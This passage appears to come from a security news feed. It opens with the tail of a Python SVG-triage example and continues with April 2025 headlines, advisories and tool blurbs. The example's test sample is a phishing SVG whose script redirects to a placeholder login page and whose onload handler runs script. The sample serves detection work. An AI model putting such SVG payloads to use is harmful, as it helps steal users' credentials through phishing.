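  <script>location.href="https://login.example.invalid/";</script>
  <rect onload="alert(1)" width="1" height="1"/>
</svg>"""

if __name__ == "__main__":
    print("benign:", triage_svg(BENIGN))
    print("phish:", triage_svg(PHISH))
```

A legitimate logo or icon attachment produces no findings; any hit on script, foreignObject or an event handler is grounds to quarantine, since none of those are needed to draw a picture.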
https://securelist.com/svg-phishing/116256/
A week in security (April 12 – April 18)
A list of topics we covered in the week of April 12 to April 18 of 2025
https://www.malwarebytes.com/blog/news/2025/04/a-week-in-security-april-12-april-18
Did DOGE “breach” Americans’ data? (Lock and Code S06E08)
This week on the Lock and Code podcast, we speak with Sydney Saubestre about DOGE and its access to Americans' data.
https://www.malwarebytes.com/blog/podcast/2025/04/did-doge-breach-americans-data-lock-and-code-s06e08
State-sponsored hackers embrace ClickFix social engineering tactic
https://www.proofpoint.com/us/newsroom/news/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic
Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin
AhnLab SEcurity intelligence Center (ASEC) recently identified cases of attacks installing Ammyy Admin on poorly managed MS-SQL servers. Ammyy Admin is a remote control tool, like AnyDesk, ToDesk and TeamViewer, used to manage systems remotely. When these tools are used properly, they enable companies and individuals to manage and control systems remotely. However, […]
https://asec.ahnlab.com/en/87606/
CentralizedFirewall - Provides A Firewall Manager API Designed To Centralize And Streamline The Management Of Firewall Configurations
Firewall Manager API Project
Installation
Follow these steps to set up and run the API project:
1. Clone the Repository
  git clone https://github.com/adriyansyah-mf/CentralizedFirewall
  cd CentralizedFirewall
2. Edit the .env File
Update the environment variables in .env according to your configuration.
  nano .env
3. Start the API with Docker Compose
  docker compose up -d
This will start the API in detached mode.
4. Verify the API is Running
Check if the containers are up:
  docker ps
Additional Commands
Stop the API: docker compose down
Restart the API: docker compose restart
How to set up for the first time and connect to a firewall client
Install the Firewall Agent on your node server. Run the agent with the following command:
  sudo dpkg -i firewall-client_deb.deb...
http://www.kitploit.com/2025/04/centralizedfirewall-provides-firewall.html
Maryam - Open-source Intelligence(OSINT) Framework
OWASP Maryam is a modular open-source framework based on OSINT and data gathering. It is designed to provide a robust environment to harvest data from open sources and search engines quickly and thoroughly.
Installation
Supported OS: Linux, FreeBSD, Darwin (OSX)
  $ pip install maryam
Alternatively, you can install the latest version with the following command (recommended):
  pip install git+https://github.com/saeeddhqan/maryam.git
Usage
  # Using dns_search. --max means all resources. --api shows the results as JSON. -t means use multi-threading.
  maryam -e dns_search -d ibm.com -t 5 --max --api --form
  # Using youtube. -q means query
  maryam -e youtube -q "<QUERY>"
  maryam -e google -q "<QUERY>"
  maryam -e dnsbrute -d domain.tld
  # Show framework modules
  maryam -e show modules
  #...
http://www.kitploit.com/2025/04/maryam-open-source-intelligenceosint.html
5 reasons to not miss Sonatype at RSAC 2025
RSA Conference (RSAC) brings together cybersecurity practitioners from across the globe to learn about the latest cybersecurity defense strategies and tools, connect with industry peers, and share knowledge about the threat landscape.
https://www.sonatype.com/blog/5-reasons-to-not-miss-sonatype-at-rsac-2025
Metasploit Wrap-Up 04/18/2025
This week, a significant enhancement was made to the already awesome fetch payload feature by our very own bwatters-r7. Learn more!
https://blog.rapid7.com/2025/04/18/metasploit-wrap-up-04-18-2025/
TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog
Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful open source tools for secrets discovery, classification, validation, and analysis. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more. With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories. ⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms. You can use online version...
http://www.kitploit.com/2025/04/trufflehog-explorer-user-friendly-web.html
YouTube Marketing Lesson From RSA Conference 2025
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story from RSA Conference Sausalito, Calif. – Apr. 18, 2025 Cybersecurity Ventures recently asked AI “Why use YouTube for marketing?” and it replied “YouTube is a powerful marketing tool because of its
The post YouTube Marketing Lesson From RSA Conference 2025 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/youtube-marketing-lesson-from-rsa-conference-2025/
16-31 December 2024 Cyber Attacks Timeline
In the second timeline of December 2024, I collected 94 events with a threat landscape dominated by malware with...
https://www.hackmageddon.com/2025/04/18/16-31-december-2024-cyber-attacks-timeline/
How Legit Is Using Classic Economic Tools to Prevent Application Vulnerabilities
Learn more about how Legit is helping enterprises prevent vulnerabilities in their SDLCs.
https://www.legitsecurity.com/blog/how-legit-is-using-classic-economic-models-to-prevent-application-vulnerabilities
What to Look for in Application Security Posture Management (ASPM)
Get details on the key capabilities for an ASPM platform.
https://www.legitsecurity.com/blog/what-to-look-for-in-application-security-posture-management-aspm
Mobile Security & Malware Issue 3rd Week of April, 2025
ASEC Blog publishes “Mobile Security & Malware Issue 3rd Week of April, 2025”
https://asec.ahnlab.com/en/87548/
Navigating the complexities of cloud security
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Technology Record Sausalito, Calif. – Apr. 17, 2025 The global threat landscape is projected to become more sophisticated, with cybercrime expected to cost the world $10.5 trillion annually by 2025, and
The post Navigating the complexities of cloud security appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/navigating-the-complexities-of-cloud-security/
Google Fixed An Old Chrome Flaw That Exposed Browsing History
Google Chrome receives a significant security update as the tech giant addresses a major security…
Google Fixed An Old Chrome Flaw That Exposed Browsing History on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/17/google-fixed-an-old-chrome-flaw-that-exposed-browsing-history/
Microsoft Defender For Endpoint Now Isolates Undiscovered Endpoints
With recent updates, Microsoft took another step towards thwarting network threats with Defender. As announced,…
Microsoft Defender For Endpoint Now Isolates Undiscovered Endpoints on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/17/microsoft-defender-for-endpoint-now-isolates-undiscovered-endpoints/
CapCut copycats are on the prowl
Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead
https://www.welivesecurity.com/en/scams/capcut-copycats-prowl/
IronHusky updates the forgotten MysterySnail RAT to target Russia and Mongolia
MysterySnail RAT attributed to IronHusky APT group hasn't been reported since 2021. Recently, Kaspersky GReAT detected new versions of this implant in government organizations in Mongolia and Russia.
https://securelist.com/mysterysnail-new-version/116226/
My New Paper on OT Ransomware!
Hello friends, I’m very excited to publish my first SANS Institute Whitepaper. I have developed a formal framework for preparing for OT / ICS ransomware attacks. I really hope you enjoy the paper and find it useful in building a strong defense against cyber-crime. You can download the white paper, A Simple Framework for OT […]
https://tisiphone.net/2025/04/16/my-new-paper-on-ot-ransomware/
Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis
Agent Tesla, Remcos RAT and XLoader delivered via a complex phishing campaign. Learn how attackers are using multi-stage delivery to hinder analysis.
The post Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis appeared first on Unit 42.
https://unit42.paloaltonetworks.com/phishing-campaign-with-complex-attack-chain/
The Windows Registry Adventure #6: Kernel-mode objects
Posted by Mateusz Jurczyk, Google Project Zero
Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses. The data stored within the regf file represents the definitive state of the hive. Knowing how to parse this data is sufficient for handling static files encoded in this format, such as when writing a custom regf parser to inspect hives extracted from a hard drive. However, for those interested in how regf files are managed by Windows at runtime, rather than just their behavior in isolation, there's a whole other...
https://googleprojectzero.blogspot.com/2025/04/the-windows-registry-adventure-6-kernel.html
What's happening with MITRE and the CVE program uncertainty
Yesterday's headlines have sent ripples through the cybersecurity and software supply chain communities: MITRE announced that U.S. government funding for the CVE (Common Vulnerabilities and Exposures) database was set to expire today. Overnight, the CVE Foundation emerged with a plan to maintain the program before the Cybersecurity and Infrastructure Security Agency (CISA) announced it has extended support for the program this morning. As the backbone of the global vulnerability identification system, CVE has long served as the industry's shared language for describing digital flaws. For Sonatype customers, here's the good news: you're already covered. Our security research and vulnerability dataset were built for this exact kind of disruption — and go far beyond CVE. ...
https://www.sonatype.com/blog/cve-program-uncertainty
Ransom & Dark Web Issues Week 3, April 2025
ASEC Blog publishes Ransom & Dark Web Issues Week 3, April 2025: Qilin Ransomware Attack on South Korean Corporations: Threat Analysis and Implications; Renowned Cybercrime Forum BreachForums Experiences Access Errors and Goes Offline; U.S.-based Imageboard Site 4chan Experiences Service Disruption Due to Hacking Incident […]
https://asec.ahnlab.com/en/87536/
Streamlining detection engineering in security operation centers
A proper detection engineering program can help improve SOC operations. In this article we'll discuss potential SOC issues, the necessary components of a detection engineering program and some useful metrics for evaluating its efficiency.
https://securelist.com/streamlining-detection-engineering/116186/
They're coming for your data: What are infostealers and how do I stay safe?
Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data
https://www.welivesecurity.com/en/malware/theyre-coming-data-infostealers-how-stay-safe/
Funding Expires for Key Cyber Vulnerability Database
A critical resource that cybersecurity professionals worldwide rely on to identify, mitigate and fix security vulnerabilities in software and hardware is in danger of breaking down. The federally funded, non-profit research and development organization MITRE warned today that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program -- which is traditionally funded each year by the Department of Homeland Security -- expires on April 16.
https://krebsonsecurity.com/2025/04/funding-expires-for-key-cyber-vulnerability-database/
Measuring success in dataops, data governance, and data security
https://www.proofpoint.com/us/newsroom/news/measuring-success-dataops-data-governance-and-data-security
Building Web Check using PaaS
How Platform as a Service (PaaS) can make good security easier to achieve.
https://www.ncsc.gov.uk/blog-post/building-web-check-using-paas
300 Milliseconds to Admin: Mastering DLL Hijacking and Hooking to Win the Race (CVE-2025-24076 and CVE-2025-24994)
As a pentester you are sometimes thrown into projects where you have no idea where you are going to end up. This project was one of those where you were given a customer laptop and the aim was to “find something interesting”, perhaps a misconfiguration on the customer side. The problem was that the laptop […]
https://blog.compass-security.com/2025/04/3-milliseconds-to-admin-mastering-dll-hijacking-and-hooking-to-win-the-race-cve-2025-24076-and-cve-2025-24994/
Trump Revenge Tour Targets Cyber Leaders, Elections
President Trump last week revoked security clearances for Chris Krebs, the former director of the Cybersecurity and Infrastructure Security Agency (CISA) who was fired by Trump after declaring the 2020 election the most secure in U.S. history. The White House memo, which also suspended clearances for other security professionals at Krebs's employer SentinelOne, comes as CISA is facing huge funding and staffing cuts.
https://krebsonsecurity.com/2025/04/trump-revenge-tour-targets-cyber-leaders-elections/
Cases Studies and Countermeasures of Credential Stuffing Attacks Using Leaked Accounts
Abstract Credential stuffing attacks using leaked passwords have been rapidly increasing. These attacks, which began with a simple technique, have evolved—through advances in automation tools and the vulnerability of credential reuse—into large-scale account breaches and financial damages. Previously, the threats could be identified simply by detecting the large number of login attempts. However, attackers today […]
https://asec.ahnlab.com/en/87535/
Case of Injection Attack Using Legitimate MS Utility mavinject.exe
1. Overview Mavinject.exe is a legitimate utility provided by Microsoft. It is used to inject DLLs into specific processes in an Application Virtualization (App-V) environment. It has been included in the operating system by default since Windows 10 version 1607, and it is a trusted executable file signed by Microsoft. As a result, most security […]
https://asec.ahnlab.com/en/87559/
April Patch Tuesday From Microsoft Fixed Over 130 Vulnerabilities
Microsoft rolled out the monthly security updates for April, fixing over a hundred different vulnerabilities.…
April Patch Tuesday From Microsoft Fixed Over 130 Vulnerabilities on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/14/april-patch-tuesday-from-microsoft-fixed-over-130-vulnerabilities/
Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware
North Korean state-sponsored group Slow Pisces (Jade Sleet) targeted crypto developers with a social engineering campaign that included malicious coding challenges.
The post Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/
Attacks on the education sector are surging: How can cyber-defenders respond?
Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk?
https://www.welivesecurity.com/en/business-security/attacks-education-sector-surging-cyber-defenders-respond/
APT Group Profiles – Larva-24005
1) Introduction During the breach investigation process, the AhnLab SEcurity intelligence Center (ASEC) discovered a new operation related to the Kimsuky group and named it Larva-24005.1 The threat actors exploited the RDP vulnerability to infiltrate the system. They then changed the system configuration by installing the MySpy malware and RDPWrap to create […]
https://asec.ahnlab.com/en/87554/
Samsung Germany Customer Tickets - 216,333 breached accounts
In March 2025, data from Samsung Germany was compromised in a data breach of their logistics provider, Spectos. Allegedly due to credentials being obtained by malware running on a Spectos employee's machine, the breach included 216k unique email addresses along with names, physical addresses, items purchased from Samsung Germany and related support tickets and shipping tracking numbers.
https://haveibeenpwned.com/PwnedWebsites#SamsungGermany
Hands-On Labs: The Key to Accelerating CMMC 2.0 Compliance
Cary, North Carolina, 11th April 2025, CyberNewsWire
Hands-On Labs: The Key to Accelerating CMMC 2.0 Compliance on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/11/hands-on-labs-the-key-to-accelerating-cmmc-2-0-compliance/
Windows CLFS Driver Elevation of Privilege
What is the Vulnerability? A zero-day vulnerability has recently been identified in the Common Log File System (CLFS) kernel driver. CLFS is a general-purpose logging subsystem within the Windows operating system that provides a high-performance way to store log data for various applications. If successfully exploited, an attacker operating under a standard user account can elevate their privileges. Furthermore, Microsoft has observed that the exploit has been utilized by PipeMagic malware and has attributed this exploitation activity to Storm-2460, which has also leveraged PipeMagic to distribute ransomware. Microsoft has published a blog that provides an in-depth analysis of Microsoft's findings regarding the CLFS exploit and the associated activities. Exploitation of CLFS zero-day leads to...
https://fortiguard.fortinet.com/threat-signal-report/6073
How we're making security easier for the average developer
Security should be native to your workflow, not a painful separate process.
The post How we're making security easier for the average developer appeared first on The GitHub Blog.
https://github.blog/security/application-security/how-were-making-security-easier-for-the-average-developer/
China-based SMS Phishing Triad Pivots to Banks
China-based purveyors of SMS phishing kits are enjoying remarkable success converting phished payment card data into mobile wallets from Apple and Google. Until recently, the so-called “Smishing Triad” mainly impersonated toll road operators and shipping companies. But experts say these groups are now directly targeting customers of international financial institutions, while dramatically expanding their cybercrime infrastructure and support staff.
https://krebsonsecurity.com/2025/04/china-based-sms-phishing-triad-pivots-to-banks/
March 2025 Deep Web and Dark Web Trends Report
Note This trend report on the deep web and dark web of March 2025 is sectioned into Ransomware, Data Breach, DarkWeb, CyberAttack, and Threat Actor. Please note that there are some parts of the content that cannot be verified for accuracy. Key Issues 1) Ransomware 1. Overview […]
https://asec.ahnlab.com/en/87553/
GOFFEE continues to attack organizations in Russia
Kaspersky researchers analyze GOFFEE's campaign in H2 2024: the updated infection scheme, new PowerModul implant, switch to a binary Mythic agent.
https://securelist.com/goffee-apt-new-attacks/116139/
Watch out for these traps lurking in search results
Here's how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results
https://www.welivesecurity.com/en/cybersecurity/watch-out-traps-lurking-search-results/
How to request a change to a CVE record
Learn how to identify which CVE Numbering Authority is responsible for the record, how to contact them, and what to include with your suggestion.
The post How to request a change to a CVE record appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/how-to-request-a-change-to-a-cve-record/
Legit Scans for Secrets in SharePoint
Get details on Legit's new ability to scan for secrets in SharePoint.
https://www.legitsecurity.com/blog/legit-scans-for-secrets-in-sharepoint
Qraved - 984,519 breached accounts
In July 2021, the Indonesian restaurant website Qraved suffered a data breach that was later redistributed as part of a larger corpus of data. The breach exposed almost 1M unique email addresses along with names, phone numbers, dates of birth and passwords stored as MD5 hashes.
https://haveibeenpwned.com/PwnedWebsites#Qraved
How Prompt Attacks Exploit GenAI and How to Fight Back
GenAI boosts productivity but also poses security risks. Palo Alto Networks has a new whitepaper about prompt-based threats and how to defend against them.
The post How Prompt Attacks Exploit GenAI and How to Fight Back appeared first on Unit 42.
https://unit42.paloaltonetworks.com/new-frontier-of-genai-threats-a-comprehensive-guide-to-prompt-attacks/
So your friend has been hacked: Could you be next?
When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe.
https://www.welivesecurity.com/en/cybersecurity/so-your-friend-has-been-hacked-could-you-be-next/
A WinRAR Flaw Could Allow MotW Security Bypass
Heads up, WinRAR users! A recently patched security flaw in WinRAR could allow mark-of-the-web (MotW)…
A WinRAR Flaw Could Allow MotW Security Bypass on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/09/a-winrar-flaw-could-allow-motw-security-bypass/
Patch Tuesday, April 2025 Edition
Microsoft today released updates to plug at least 121 security holes in its Windows operating systems and software, including one vulnerability that is already being exploited in the wild. Eleven of those flaws earned Microsoft's most-dire "critical" rating, meaning malware or malcontents could exploit them with little to no interaction from Windows users.
https://krebsonsecurity.com/2025/04/patch-tuesday-april-2025-edition/
Boulanger - 2,077,078 breached accounts
In September 2024, French electronics retailer Boulanger suffered a data breach that exposed over 27M rows of data. The data included 2M unique email addresses along with names, physical addresses, phone numbers and latitude and longitude. The data was later publicly published to a popular hacking forum. The data was provided to HIBP by a source who requested it be attributed to "leidhall".
https://haveibeenpwned.com/PwnedWebsites#Boulanger
Found means fixed: Reduce security debt at scale with GitHub security campaigns
Starting today, security campaigns are generally available for all GitHub Advanced Security and GitHub Code Security customers—helping organizations take control of their security debt and manage risk by unlocking collaboration between developers and security teams.
The post Found means fixed: Reduce security debt at scale with GitHub security campaigns appeared first on The GitHub Blog.
https://github.blog/security/application-security/found-means-fixed-reduce-security-debt-at-scale-with-github-security-campaigns/
Campaign Targets Amazon EC2 Instance Metadata via SSRF
Discover the latest CVE trends and a new campaign targeting websites hosted in EC2 instances on AWS.
https://www.f5.com/labs/articles/threat-intelligence/campaign-targets-amazon-ec2-instance-metadata-via-ssrf
Attackers distributing a miner and the ClipBanker Trojan via SourceForge
Malicious actors are using SourceForge to distribute a miner and the ClipBanker Trojan while utilizing unconventional persistence techniques.
https://securelist.com/miner-clipbanker-sourceforge-campaign/116088/
1 billion reasons to protect your identity online
Corporate data breaches are a gateway to identity fraud, but they're not the only one. Here's a lowdown on how your personal data could be stolen – and how to make sure it isn't.
https://www.welivesecurity.com/en/cybersecurity/1-billion-reasons-protect-identity-online/
No certificate name verification for fgfm connection
An improper restriction of communication channel to intended endpoints vulnerability [CWE-923] in FortiOS, FortiProxy, FortiManager, FortiAnalyzer, FortiVoice and FortiWeb may allow an unauthenticated attacker in a man-in-the-middle position to impersonate the management device (FortiCloud server or/and, in certain conditions, FortiManager) via intercepting the FGFM authentication request between the management device and the managed device. Revised on 2025-04-22 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-046
Directory Traversal
An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability [CWE-22] in FortiWeb endpoint may allow an authenticated admin to access and modify the filesystem via crafted requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-474
EMS can send javascript code to client through messages
An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in FortiClient may allow the EMS administrator to send messages containing javascript code. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-344
Incorrect user management in widgets dashboard
An Incorrect User Management vulnerability [CWE-286] in FortiWeb widgets dashboard may allow an authenticated attacker with at least read-only admin permission to perform operations on the dashboard of other administrators via crafted requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-184
LDAP Clear-text credentials retrievable with IP modification
An insufficiently protected credentials [CWE-522] vulnerability in FortiOS may allow a privileged authenticated attacker to retrieve LDAP credentials via modifying the LDAP server IP address in the FortiOS configuration to point to a malicious attacker-controlled server. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-111
Log Pollution via login page
An Improper Output Neutralization for Logs vulnerability [CWE-117] in FortiManager and FortiAnalyzer may allow an unauthenticated remote attacker to pollute the logs via crafted login requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-453
OS command injection on diagnose feature (GUI)
An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in FortiIsolator may allow a privileged attacker with super-admin profile and CLI access to execute unauthorized code via specifically crafted HTTP requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-397
OS command injection on gen-ca-cert command
An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in FortiIsolator CLI may allow a privileged attacker to execute unauthorized code or commands via crafted CLI requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-392
Proofpoint Simplifies Security Solutions Sales For Partners Through Ingram Micro Xvantage Platform
https://www.proofpoint.com/us/newsroom/news/proofpoint-simplifies-security-solutions-sales-partners-through-ingram-micro-xvantage
Legit and Traceable: Better Together
Get details on Legit's new partnership with Traceable.
https://www.legitsecurity.com/blog/legit-and-traceable-better-together
SpyCloud Research Shows that Endpoint Detection and Antivirus Solutions Miss Two-Thirds (66%) of Malware Infections
Austin, TX, USA, 7th April 2025, CyberNewsWire
SpyCloud Research Shows that Endpoint Detection and Antivirus Solutions Miss Two-Thirds (66%) of Malware Infections on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/07/spycloud-research-shows-that-endpoint-detection-and-antivirus-solutions-miss-two-thirds-66-of-malware-infections/
Key Cybersecurity Challenges In 2025—Trends And Observations
https://www.proofpoint.com/us/newsroom/news/key-cybersecurity-challenges-2025-trends-and-observations
Kubernetes Ingress-nginx Controller RCE
What is the Vulnerability? On March 24, researchers disclosed a set of five vulnerabilities, collectively known as "IngressNightmare," affecting Ingress-nginx, one of the popular ingress controllers available for Kubernetes. Using Ingress-NGINX is one of the most common methods for exposing Kubernetes applications externally. CVE-2025-1974 is considered the most serious of the five and has been assigned a CVSS score of 9.8 (critical). When chained with one of the lower severity vulnerabilities, it allows for unauthenticated remote code execution. This exploitation could result in the exposure of sensitive information that the controller can access. Consequently, unauthenticated attackers have the potential to compromise the system by executing unauthorized code. What is the recommended Mitigation? Kubernetes...
https://fortiguard.fortinet.com/threat-signal-report/6061
Google announces Sec-Gemini v1, a new experimental cybersecurity model
Posted by Elie Burzstein and Marianna Tishchenko, Sec-Gemini team. Today, we're announcing Sec-Gemini v1, a new experimental AI model focused on advancing cybersecurity AI frontiers. As outlined a year ago, defenders face the daunting task of securing against all cyber threats, while attackers need to successfully find and exploit only a single vulnerability. This fundamental asymmetry has made securing systems extremely difficult, time consuming and error prone. AI-powered cybersecurity workflows have the potential to help shift the balance back to the defenders by force multiplying cybersecurity professionals like never before. Effectively powering SecOps workflows requires state-of-the-art reasoning capabilities and extensive current cybersecurity knowledge. Sec-Gemini v1 achieves...
http://security.googleblog.com/2025/04/google-launches-sec-gemini-v1-new.html
Taming the Wild West of ML: Practical Model Signing with Sigstore
Posted by Mihai Maruseac, Google Open Source Security Team (GOSST). In partnership with NVIDIA and HiddenLayer, as part of the Open Source Security Foundation, we are now launching the first stable version of our model signing library. Using digital signatures like those from Sigstore, we allow users to verify that the model used by the application is exactly the model that was created by the developers. In this blog post we will illustrate why this release is important from Google's point of view. With the advent of LLMs, the ML field has entered an era of rapid evolution. We have seen remarkable progress leading to weekly launches of various applications which incorporate ML models to perform tasks ranging from customer support, software development, and even performing security critical...
http://security.googleblog.com/2025/04/taming-wild-west-of-ml-practical-model.html
Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe
A Minnesota cybersecurity and computer forensics expert whose testimony has featured in thousands of courtroom trials over the past 30 years is facing questions about his credentials and an inquiry from the Federal Bureau of Investigation (FBI). Legal experts say the inquiry could be grounds to reopen a number of adjudicated cases in which the expert's testimony may have been pivotal.
https://krebsonsecurity.com/2025/04/cyber-forensic-expert-in-2000-cases-faces-fbi-probe/
The Power of Identifying Continuously Vulnerable Repositories (CVRs)
Learn more about how Legit is helping enterprises prevent vulnerabilities in their SDLCs.
https://www.legitsecurity.com/blog/identifying-continuously-vulnerable-repositories
1-15 December 2024 Cyber Attacks Timeline
In the first timeline of December 2024, I collected 115 events (7.67 events/day) with a threat landscape dominated...
https://www.hackmageddon.com/2025/04/04/1-15-december-2024-cyber-attacks-timeline/
OH-MY-DC: OIDC Misconfigurations in CI/CD
We found three key attack vectors in OpenID Connect (OIDC) implementation and usage. Bad actors could exploit these to access restricted resources.
The post OH-MY-DC: OIDC Misconfigurations in CI/CD appeared first on Unit 42.
https://unit42.paloaltonetworks.com/oidc-misconfigurations-in-ci-cd/
Localhost dangers: CORS and DNS rebinding
What is CORS and how can a CORS misconfiguration lead to security issues? In this blog post, we'll describe some common CORS issues as well as how you can find and fix them.
The post Localhost dangers: CORS and DNS rebinding appeared first on The GitHub Blog.
https://github.blog/security/application-security/localhost-dangers-cors-and-dns-rebinding/
The good, the bad and the unknown of AI: A Q&A with Mária Bieliková
The computer scientist and AI researcher shares her thoughts on the technology's potential and pitfalls – and what may lie ahead for us
https://www.welivesecurity.com/en/we-live-science/good-bad-unknown-ai-qa-maria-bielikova/
New guidance on securing HTTP-based APIs
Why it's essential to secure your APIs to build trust with your customers and partners.
https://www.ncsc.gov.uk/blog-post/new-guidance-on-securing-http-based-apis
New online training helps board members to govern cyber risk
The NCSC's CEO, Richard Horne on the new cyber governance resources giving Boards the tools they need to govern cyber security risks.
https://www.ncsc.gov.uk/blog-post/new-online-training-helps-board-members-govern-cyber-risk
Open Source Malware Index Q1 2025: Data exfil threats rising sharply
Sonatype's ongoing mission is to equip organizations with the most up-to-date information on open source security threats. As part of that commitment, we will be sharing data and insights on a quarterly basis, diving into how the open source malware space is evolving, including diving into notable malicious packages.
https://www.sonatype.com/blog/open-source-malware-index-q1-2025
Lesley, What Happened to the “Cybersecurity Skills Shortage”?
Are you stressed out right now? I’m stressed out. Most Americans are, and cybersecurity job seekers are definitely not an exception. I do a ton of career mentoring and career clinics, and I see… the brunt of it. The last few mentoring Sundays I've done, I have had two or more people burst into tears. […]
https://tisiphone.net/2025/04/01/lesley-what-happened-to-the-cybersecurity-skills-shortage/
GitHub found 39M secret leaks in 2024. Here's what we're doing to help
Every minute, GitHub blocks several secrets with push protection—but secret leaks still remain one of the most common causes of security incidents. Learn how GitHub is making it easier to protect yourself from exposed secrets, including today's launches of standalone Secret Protection, org-wide scanning, and better access for teams of all sizes.
The post GitHub found 39M secret leaks in 2024. Here’s what we’re doing to help appeared first on The GitHub Blog.
https://github.blog/security/application-security/next-evolution-github-advanced-security/
Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon
Phishing with QR codes: New tactics described here include concealing links with redirects and using Cloudflare Turnstile to evade security crawlers.
The post Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon appeared first on Unit 42.
https://unit42.paloaltonetworks.com/qr-code-phishing/
Protective DNS for the private sector
Advice on the selection and deployment of Protective Domain Name Systems (DNS).
https://www.ncsc.gov.uk/guidance/protective-dns-for-private-sector
I wannabe Red Team Operator
Red Team Operator. A hype-tagged role tag for which one question hits our corporate LinkedIn inbox very often. “Hey there, how can I become a Red Team Operator? Yours sincerely, a recent graduate.” To us, this is like asking how to become a regular starter on a Premier League football team. There's nothing wrong with […]
https://blog.compass-security.com/2025/04/i-wannabe-red-team-operator/
What's My Daily Life Like (in OT DFIR)?
One of the most common questions I get asked by aspiring (and current) cybersecurity professionals is what my odd niche of the universe in critical infrastructure incident response is really like, day to day. So let me give a brief overview of what my work life is like. The first thing one needs to understand […]
https://tisiphone.net/2025/03/31/whats-my-daily-life-like-in-ot-dfir/
ImageRunner: Privilege Escalation Vulnerability in GCP Cloud Run
An attacker with `run.services.update` and `iam.serviceAccounts.actAs` permissions but without explicit registry access could deploy new revisions of Cloud Run services that pulled private container images stored in the same GCP project. This was possible because Cloud Run uses a service agent with the necessary registry read permissions to retrieve these images, regardless of the caller's access level. By updating a service revision and injecting malicious commands into the container's arguments (e.g., using Netcat for reverse shell access), attackers could extract secrets or run unauthorized code. The flaw stemmed from the Cloud Run service agent's trust model, which did not enforce a separate registry permission check on the deploying identity. Google has since modified this behavior...
https://www.cloudvulndb.org/imagerunner
Ivanti Connect Secure Zero-Day Vulnerability
What are the Vulnerabilities? Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. CVE-2025-0282 is an unauthenticated stack-based buffer overflow affecting Ivanti Connect Secure, Policy Secure, and ZTA Gateways. Successful exploitation could result in unauthenticated remote code execution. CVE-2025-0283 is a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allows a local authenticated attacker to escalate their privileges. According to a blog released by Mandiant, it has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. Ivanti Connect...
https://fortiguard.fortinet.com/threat-signal-report/5612
ClamAV 1.5.0 beta now available!
